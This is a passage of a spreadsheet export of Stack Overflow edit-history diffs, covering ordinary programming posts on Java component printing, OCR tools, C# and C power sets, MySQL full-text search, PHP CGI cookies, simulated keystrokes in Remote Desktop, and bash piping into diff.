&lt;span class="diff-delete"&gt;    &lt;/span&gt;// STATIC METHODS_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;// *****************************************************************************_x000D_
_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;static public void printComponent(Component com) throws PrinterException {_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;    new ComponentPrinter(com).print();_x000D_
    }_x000D_
_x000D_
} // END PUBLIC CLASS_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;package dol.lpc.lib.gui;_x000D_
_x000D_
import java.awt.*;_x000D_
import java.awt.print.*;_x000D_
import javax.swing.*;_x000D_
_x000D_
/**_x000D_
 * Generic component printer.  This object allows any AWT or Swing component  (or DCT system)_x000D_
 * to be printed by performing it pre and post print responsibilities._x000D_
 * &amp;lt;p&amp;gt;_x000D_
 * When printing components, the role of the print method is nothing more than to scale the Graphics, turn off double_x000D_
 * buffering, and call paint.  There is no particular reason to put that print method in the component being printed.  A_x000D_
 * better approach is to build a generic printComponent method to which you simply pass the component you want printed._x000D_
 * &amp;lt;p&amp;gt;_x000D_
 * With Swing, almost all components have double buffering turned on by default. In general, this is a great benefit,_x000D_
 * making for convenient and efficient painting. However, in the specific case of printing, it can is a huge problem._x000D_
 * First, since printing components relies on scaling the coordinate system and then simply calling the component's_x000D_
 * paint method, if double buffering is enabled printing amounts to little more than scaling up the buffer (off-screen_x000D_
 * image) which results in ugly low-resolution printing like you already had available. Secondly, sending these huge_x000D_
 * buffers to the printer results in huge print spooler files which take a very long time to print. Consequently this_x000D_
 * object globally turns off double buffering before printing and turns it back on afterwards._x000D_
 * &amp;lt;p&amp;gt;_x000D_
 * Threading Design : [x] Single Threaded  [ ] Threadsafe  [ ] Immutable  [ ] Isolated_x000D_
 */_x000D_
_x000D_
public class ComponentPrinter&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;extends Object&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;implements Printable&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;{_x000D_
_x000D_
&lt;span class="diff-add"&gt;//&lt;/span&gt; &lt;span class="diff-add"&gt;*****************************************************************************_x000D_
//&lt;/span&gt; &lt;span class="diff-add"&gt;INSTANCE&lt;/span&gt; &lt;span class="diff-add"&gt;PROPERTIES_x000D_
&lt;/span&gt;// *****************************************************************************&lt;span class="diff-add"&gt;&amp;nbsp;_x000D_
&lt;/span&gt;_x000D_
&lt;span class="diff-add"&gt;private&lt;/span&gt; &lt;span class="diff-add"&gt;Component&lt;/span&gt;               &lt;span class="diff-add"&gt;       &lt;/span&gt; component;&lt;span class="diff-add"&gt;                             &lt;/span&gt; // the component to print_x000D_
_x000D_
// *****************************************************************************_x000D_
// INSTANCE CREATE/DELETE_x000D_
// *****************************************************************************_x000D_
_x000D_
public ComponentPrinter(Component com) {_x000D_
    component=com;_x000D_
    }_x000D_
_x000D_
// *****************************************************************************_x000D_
// INSTANCE METHODS_x000D_
// *****************************************************************************_x000D_
_x000D_
public void print() throws PrinterException {_x000D_
    &lt;span class="diff-add"&gt;PrinterJob&lt;/span&gt;    &lt;span class="diff-add"&gt;                     &lt;/span&gt; printJob=PrinterJob.getPrinterJob();_x000D_
_x000D_
    printJob.setPrintable(this);_x000D_
    if(printJob.printDialog()) {_x000D_
        printJob.print();_x000D_
        }_x000D_
    }_x000D_
_x000D_
public int print(Graphics gc, PageFormat pageFormat, int pageIndex) {_x000D_
    if(pageIndex&amp;gt;0) {_x000D_
        return NO_SUCH_PAGE;_x000D_
        }_x000D_
_x000D_
    RepaintManager&lt;span class="diff-add"&gt; &lt;/span&gt; mgr=RepaintManager.currentManager(component);_x000D_
    &lt;span class="diff-add"&gt;Graphics2D&lt;/span&gt;      &lt;span class="diff-add"&gt;g2d=&lt;/span&gt;(Graphics2D)gc;_x000D_
_x000D_
    g2d.translate(pageFormat.getImageableX(),pageFormat.getImageableY());_x000D_
    mgr.setDoubleBufferingEnabled(false);&lt;span class="diff-add"&gt;                                     &lt;/span&gt;  // only for swing components_x000D_
    component.paint(g2d);_x000D_
    mgr.setDoubleBufferingEnabled(true);&lt;span class="diff-add"&gt;                                     &lt;/span&gt;   // only for swing components_x000D_
    return PAGE_EXISTS;_x000D_
    }_x000D_
_x000D_
// *****************************************************************************_x000D_
// STATIC METHODS_x000D_
// *****************************************************************************_x000D_
_x000D_
static public void printComponent(Component com) throws PrinterException {_x000D_
    new ComponentPrinter(com).print();_x000D_
    }_x000D_
_x000D_
} // END PUBLIC CLASS_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Lawrence Dol</t>
  </si>
  <si>
    <t>Lahiru Ashan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-delete"&gt;Update 2015-01-02&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-delete"&gt;: More flexible version without &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;synchronized&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; methods. (&lt;/span&gt;&lt;a href="http://stackoverflow.com/a/27737289/363573"&gt;&lt;span class="diff-delete"&gt;View&lt;/span&gt;&lt;/a&gt;&lt;span class="diff-delete"&gt;)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Updated 2014-02-19&lt;/strong&gt;: To use EventQueue.invokeLater() to avoid GUI threading issues which can crop up very rarely with the original.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Updated 2014-02-19&lt;/strong&gt;: To use EventQueue.invokeLater() to avoid GUI threading issues which can crop up very rarely with the original.&lt;/p&gt; _x000D_
 &lt;div class="diff-skipped"&gt; _x000D_
  &lt;div&gt;&lt;/div&gt; _x000D_
 &lt;/div&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Stephan</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are best tools available for Data Capturing from Scanned Images? Doesn't matter they are free or paid. They should be able to convert scanned images to data (text, image, tables etc.). &lt;strong&gt;Most importantly they should have API to integrate with .NET 2.0 for automation.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &amp;nbsp;&lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; What are best tools available for Data Capturing from Scanned Images? Doesn't matter they are free or paid. They should be able to convert scanned images to data (text, image, tables etc.). &lt;strong&gt;Most importantly they should have API to integrate with .NET 2.0 for automation.&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; **Edit: The input data will generally be Text, Images, Tables places in the image. These images will basically be scanned pages from Catalogs containing data.** &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Ramesh Soni</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I get &lt;span class="diff-delete"&gt;integer&lt;/span&gt; and &lt;span class="diff-delete"&gt;fraction&lt;/span&gt; from double in jsp/java?&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt; If the value is &lt;span class="hljs-number"&gt;3.25&lt;/span&gt; then I want to get &lt;span class="diff-delete"&gt;fraction&lt;/span&gt; =&lt;span class="hljs-number"&gt;.25&lt;/span&gt;, &lt;span class="diff-delete"&gt;integer&lt;/span&gt; = &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; How can we do this in java?&lt;/p&gt; _x000D_
 &lt;p&gt; Any pointers is highly appreciated.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How do I get &lt;span class="diff-add"&gt;Mantissa&lt;/span&gt; and &lt;span class="diff-add"&gt;Exponent&lt;/span&gt; from double in jsp/java?&lt;/p&gt; _x000D_
 &lt;pre class="lang-java s-code-block hljs"&gt;&lt;code&gt; If the value is &lt;span class="hljs-number"&gt;3.25&lt;/span&gt; then I want to get &lt;span class="diff-add"&gt;mantissa&lt;/span&gt; =&lt;span class="hljs-number"&gt;.25&lt;/span&gt;, &lt;span class="diff-add"&gt;exponent&lt;/span&gt; = &lt;span class="hljs-number"&gt;3&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; How can we do this in java?&lt;/p&gt; _x000D_
 &lt;p&gt; Any pointers is highly appreciated.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am looking to refactor a c# method into a c function in an attempt to gain some speed, and then call the c dll in c# to allow my program to use the functionality.&lt;/p&gt; _x000D_
 &lt;p&gt; Currently the c# method takes a list of integers and returns a list of lists of integers. The method calculated the power set of the integers so an input of 3 ints would produce the following output (at this stage the values of the ints is not important as it is used as an internal weighting value)&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs"&gt;&lt;code&gt;1_x000D_
2_x000D_
3_x000D_
1,2_x000D_
1,3_x000D_
2,3_x000D_
1,2,3_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Where each line represents a list of integers. The output indicates the index (with an offset of 1) of the first list, not the value. So 1,2 indicates that the element at index 0 and 1 are an element of the power set.&lt;/p&gt; _x000D_
 &lt;p&gt; I am unfamiliar with c, so what are my best options for data structures that will allow the c# to access the returned data?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you all for your comments so far. Here is a bit of a background to the nature of the problem.&lt;/p&gt; _x000D_
 &lt;p&gt; The iterative method for calculating the power set of a set is fairly straight forward. Two loops and a bit of bit manipulation is all there is to it really. It just get called..a lot (in fact billions of times if the size of the set is big enough).&lt;/p&gt; _x000D_
 &lt;p&gt; My thoughs around using c (c++ as people have pointed out) are that it gives more scope for performance tuning. A direct port may not offer any increase, but it opens the way for more involved methods to get a bit more speed out of it. Even a small increase per iteration would equate to a measurable increase.&lt;/p&gt; _x000D_
 &lt;p&gt; My idea was to port a direct version and then work to increase it. And then refactor it over time (with help from everyone here at SO).&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I am looking to refactor a c# method into a c function in an attempt to gain some speed, and then call the c dll in c# to allow my program to use the functionality.&lt;/p&gt; _x000D_
 &lt;p&gt; Currently the c# method takes a list of integers and returns a list of lists of integers. The method calculated the power set of the integers so an input of 3 ints would produce the following output (at this stage the values of the ints is not important as it is used as an internal weighting value)&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs"&gt;&lt;code&gt;1_x000D_
2_x000D_
3_x000D_
1,2_x000D_
1,3_x000D_
2,3_x000D_
1,2,3_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Where each line represents a list of integers. The output indicates the index (with an offset of 1) of the first list, not the value. So 1,2 indicates that the element at index 0 and 1 are an element of the power set.&lt;/p&gt; _x000D_
 &lt;p&gt; I am unfamiliar with c, so what are my best options for data structures that will allow the c# to access the returned data?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks in advance&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Thank you all for your comments so far. Here is a bit of a background to the nature of the problem.&lt;/p&gt; _x000D_
 &lt;p&gt; The iterative method for calculating the power set of a set is fairly straight forward. Two loops and a bit of bit manipulation is all there is to it really. It just get called..a lot (in fact billions of times if the size of the set is big enough).&lt;/p&gt; _x000D_
 &lt;p&gt; My thoughs around using c (c++ as people have pointed out) are that it gives more scope for performance tuning. A direct port may not offer any increase, but it opens the way for more involved methods to get a bit more speed out of it. Even a small increase per iteration would equate to a measurable increase.&lt;/p&gt; _x000D_
 &lt;p&gt; My idea was to port a direct version and then work to increase it. And then refactor it over time (with help from everyone here at SO).&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Update 2&lt;/span&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Another fair point from jalf, I dont have to use list or equivelent. If there is a better way then I am open to suggestions. The only reason for the list was that each set of results is not the same size.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>jheppinstall</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;First&lt;/span&gt; guess:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  if(e.Item.ItemType == ListItemType.Item _x000D_
       || e.Item.ItemType == ListItemType.AlternatingItem)_x000D_
    {_x000D_
        //Put stuff here_x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Have you tried checking&lt;/span&gt; the&lt;span class="diff-delete"&gt; collection to see if there is something wrong with it? It could be possible that an&lt;/span&gt; item&lt;span class="diff-delete"&gt; in the collection is somehow null even though the collection&lt;/span&gt; itself &lt;span class="diff-delete"&gt;contains many items&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Right off the bat I would have to&lt;/span&gt; guess&lt;span class="diff-add"&gt; you need this&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;  if(e.Item.ItemType == ListItemType.Item _x000D_
       || e.Item.ItemType == ListItemType.AlternatingItem)_x000D_
    {_x000D_
        //Put stuff here_x000D_
    }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;After all,&lt;/span&gt; the item itself &lt;span class="diff-add"&gt;could be representing a header or footer row&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Programmin Tool</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A qucik google gave me this link: &lt;a href="http://www.mysqlperformanceblog.com/?s=select+match+against+as+relevance" rel="nofollow noreferrer"&gt;http://www.mysqlperformanceblog.com/?s=select+match+against+as+relevance&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;SELECT&lt;/span&gt; &lt;span class="diff-delete"&gt;`title`&lt;/span&gt;, &lt;span class="diff-delete"&gt;MATCH&lt;/span&gt; (&lt;span class="diff-delete"&gt;`title`&lt;/span&gt;,&lt;span class="diff-delete"&gt;`content`&lt;/span&gt;) &lt;span class="diff-delete"&gt;AGAINST&lt;/span&gt; (â€?internetâ€?)&lt;span class="diff-delete"&gt; AS&lt;/span&gt; &lt;span class="diff-delete"&gt;`score`&lt;/span&gt; &lt;span class="diff-delete"&gt;_x000D_
FROM&lt;/span&gt; &lt;span class="diff-delete"&gt;`cont`&lt;/span&gt; &lt;span class="diff-delete"&gt;_x000D_
WHERE&lt;/span&gt; &lt;span class="diff-delete"&gt;MATCH&lt;/span&gt; (&lt;span class="diff-delete"&gt;`title`&lt;/span&gt;,&lt;span class="diff-delete"&gt;`content`&lt;/span&gt;) &lt;span class="diff-delete"&gt;AGAINST&lt;/span&gt; (â€?internetâ€?) &lt;span class="diff-delete"&gt;_x000D_
LIMIT&lt;/span&gt; &lt;span class="diff-delete"&gt;10&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A qucik google gave me this link: &lt;a href="http://www.mysqlperformanceblog.com/?s=select+match+against+as+relevance" rel="nofollow noreferrer"&gt;http://www.mysqlperformanceblog.com/?s=select+match+against+as+relevance&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Example:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;select&lt;/span&gt; &lt;span class="diff-add"&gt;title&lt;/span&gt;, &lt;span class="diff-add"&gt;match&lt;/span&gt; (&lt;span class="diff-add"&gt;title&lt;/span&gt;,&lt;span class="diff-add"&gt;content&lt;/span&gt;) &lt;span class="diff-add"&gt;against&lt;/span&gt; (â€?internetâ€?)&lt;span class="diff-add"&gt;as&lt;/span&gt; &lt;span class="diff-add"&gt;score&lt;/span&gt; &lt;span class="diff-add"&gt;from&lt;/span&gt; &lt;span class="diff-add"&gt;cont&lt;/span&gt; &lt;span class="diff-add"&gt;where&lt;/span&gt; &lt;span class="diff-add"&gt;match&lt;/span&gt; (&lt;span class="diff-add"&gt;title&lt;/span&gt;,&lt;span class="diff-add"&gt;content&lt;/span&gt;) &lt;span class="diff-add"&gt;against&lt;/span&gt; (â€?internetâ€?) &lt;span class="diff-add"&gt;limit&lt;/span&gt; &lt;span class="diff-add"&gt;10;`&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; `&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Filip Ekberg</t>
  </si>
  <si>
    <t>Basti</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Ok you want to setup&lt;/span&gt; cookies&lt;span class="diff-delete"&gt; with php&lt;/span&gt; in a CGI Enviroment?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Copy the code and name it to whatever.cgi and make it executable&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;#!/usr/bin/php_x000D_
function set_cookie($cookiename,$cookievalue,$cookietime){_x000D_
   echo 'set-cookie: '.$cookiename.'="'.$cookievalue.'"; max-age="'.$cookietime.'";'."\n";  _x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; The \n at the end of the line is a must. Or you will run into trouble :) Now let's set a cookie:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;set_cookie("foo","bar",60)_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Sets the Cookie with the Name foo to the Value bar. Expires in 60 seconds.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Now you can start with the HTML Header.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;echo "Content-Type: text/html\n\n";_x000D_
echo "&amp;lt;html&amp;gt;\n";_x000D_
echo "&amp;lt;head&amp;gt;\n";_x000D_
echo "&amp;lt;title&amp;gt;whatever&amp;lt;/title&amp;gt;\n";_x000D_
echo "&amp;lt;/head&amp;gt;\n";_x000D_
echo "&amp;lt;body&amp;gt;\n";_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you want to delete the cookie, set the max-age to zero&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;function set_cookie($cookiename){_x000D_
   echo 'set-cookie: '.$cookiename.'="0"; max-age="0";'."\n";  _x000D_
}_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;How can I use&lt;/span&gt; cookies in a&lt;span class="diff-add"&gt; php&lt;/span&gt; CGI Enviroment&lt;span class="diff-add"&gt; without using any api functions from PHP&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>evildead</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Found my own answer. If someone could copy/paste it into an answer so i can mark it as the answer, and answer this question, to take it off the unanswered list - i would appreciate it.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; i'm trying to send fake keyboard input to an application that's running in a Remote Desktop session. i'm using:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Byte key = Ord("A");_x000D_
_x000D_
keybd_event(key, 0, 0, 0); // key goes down_x000D_
keybd_event(key, 0, KEYEVENTF_KEYUP, 0); // key goes up_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now this code does send the character "a" to any local window, but it will not send to the remote desktop window.&lt;/p&gt; _x000D_
 &lt;p&gt; What that means is i use Remote Desktop to connect to a server, and i then open Notepad on that server. If i manually punch keys on the keyboard: they appear in Notepad's editor window. But keybd_event's fake keyboard input not causing "a"'s to appear in Notepad.&lt;/p&gt; _x000D_
 &lt;p&gt; How can i programtically send fake keyboard input to an application running inside a remote desktop connection, from an application running on the local machine?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Nitpickers Corner&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; In this particular case i want to do this becase i'm trying to defeat an idle-timeout. But i could just as well be trying to&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; perform UI automation tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI stress tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI fault finding tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI unit tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI data input tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI paint tests&lt;/li&gt; _x000D_
  &lt;li&gt; or UI resiliance tests.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In other words, my reasons for wanting it aren't important&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The timeout may be from remote desktop inactivity, or perhaps not. i don't know, and it doesn't affect my question.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; i'm trying to send fake keyboard input to an application that's running in a Remote Desktop session. i'm using:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Byte key = Ord("A");_x000D_
_x000D_
keybd_event(key, 0, 0, 0); // key goes down_x000D_
keybd_event(key, 0, KEYEVENTF_KEYUP, 0); // key goes up_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Now this code does send the character "a" to any local window, but it will not send to the remote desktop window.&lt;/p&gt; _x000D_
 &lt;p&gt; What that means is i use Remote Desktop to connect to a server, and i then open Notepad on that server. If i manually punch keys on the keyboard: they appear in Notepad's editor window. But keybd_event's fake keyboard input not causing "a"'s to appear in Notepad.&lt;/p&gt; _x000D_
 &lt;p&gt; How can i programtically send fake keyboard input to an application running inside a remote desktop connection, from an application running on the local machine?&lt;/p&gt; _x000D_
 &lt;hr&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Nitpickers Corner&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; In this particular case i want to do this becase i'm trying to defeat an idle-timeout. But i could just as well be trying to&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; perform UI automation tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI stress tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI fault finding tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI unit tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI data input tests&lt;/li&gt; _x000D_
  &lt;li&gt; UI paint tests&lt;/li&gt; _x000D_
  &lt;li&gt; or UI resiliance tests.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; In other words, my reasons for wanting it aren't important&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The timeout may be from remote desktop inactivity, or perhaps not. i don't know, and it doesn't affect my question.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Stephen Kennedy</t>
  </si>
  <si>
    <t>Ian Boyd</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A one-line with 2 tmp files (not what you want) would be:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt; foo | bar &amp;gt; file1.txt &amp;amp;&amp;amp; baz | quux &amp;gt; file2.txt &amp;amp;&amp;amp; diff file1.txt file2.txt_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; With &lt;strong&gt;bash&lt;/strong&gt;, you might try though:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt; diff &amp;lt;(foo | bar) &amp;lt;(baz | quux)_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; As mentioned in the &lt;a href="http://stackoverflow.com/questions/345505#345536"&gt;BenM's detailed answer&lt;/a&gt;, &lt;code&gt;&amp;lt;&lt;/code&gt; creates anonymous named pipes -- managed by bash -- so they are created and destroyed automatically, unlike temporary files.&lt;br&gt; However, &lt;a href="http://stackoverflow.com/questions/345505#345558"&gt;Daniel Cassidy&lt;/a&gt; points out the "without using temporary files" part of the question is not respected: the file system is still modified (with a directory entry representing the named pipe created and then removed)&lt;/p&gt; _x000D_
 &lt;p&gt; Otherwise, like you mention in your question, you have to use - as STDIN&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt; foo | bar &amp;gt; file1.txt &amp;amp;&amp;amp; baz | quux | diff file1.txt - &amp;amp;&amp;amp; rm file1.txt_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;, since there seems to be no easy way to pipe multiple inputs to one command.&lt;/p&gt; _x000D_
 &lt;p&gt; You can pipe &lt;em&gt;one output&lt;/em&gt; to &lt;em&gt;multiple inputs&lt;/em&gt; with the tee command:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt;ls *.txt | tee txtlist.txt _x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The above command displays the output of ls *.txt to the terminal and outputs it to the text file txtlist.txt.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; A one-line with 2 tmp files (not what you want) would be:&lt;/p&gt; _x000D_
 &lt;pre class="lang-sh s-code-block hljs bash"&gt;&lt;code&gt; foo | bar &amp;gt; file1.txt &amp;amp;&amp;amp; baz | quux &amp;gt; file2.txt &amp;amp;&amp;amp; diff file1.txt file2.txt_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
